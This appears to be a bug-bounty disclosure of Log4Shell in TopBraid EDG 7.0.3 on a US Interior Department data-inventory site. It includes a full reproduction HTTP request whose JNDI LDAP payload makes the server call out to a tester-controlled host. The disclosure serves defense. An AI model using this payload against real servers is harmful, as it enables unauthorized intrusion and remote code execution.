Summary by aminei
Log4Shell in TopbraidEDG before version 7.0.4 when a security filter is turned off.
Log4Shell in TopbraidEDG before version 7.0.4 when a security filter is turned off.
*.doi.gov
Web App
https://datainventory.doi.gov/explorer/tbl/swp
Log4Shell is exploitable in datainventory.doi.gov which uses TopBraid EDG 7.0.3. This version is vulnerable to Log4Shell. I managed to find a vulnerable endpoint with a working proof of concept.
Base score: 10
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
First go to https://datainventory.doi.gov/explorer/ and click on "Enter explorer" to login as explorer.
Then setup a listener on port 22 on a server you control using for instance netcat:
Once logged in as explorer, send the following request using a proxy such as BurpSuite:
POST /explorer/tbl/swp HTTP/1.1
Host: datainventory.doi.gov
Content-Type: application/x-www-form-urlencoded;charset=utf-8
Content-Length: 155
Cookie: browserCompatibility=checked; JSESSIONID=YOUR_JSESSIONID_COOKIE
_viewClass=teamwork%3ACommentAndTaskCountService&resource=urn%3Ax-evn-master%3Awf_core_ent_nwcg_org&_base=http%3A%2F%2Frdfex.o${jndi:ldap://YOUR_IP:22}
Please replace the IP in the ${jndi:ldap://YOUR_IP:22}
with an IP you control and send the request. The datainventory server will succesfully query the endpoint.
I have not exploited the server further because it would lead to a remote code execution. I don't feel comfortable doing so on a US department of interior server without prior authorization.
An malicious attacker could obtain a shell via remote code execution on the server.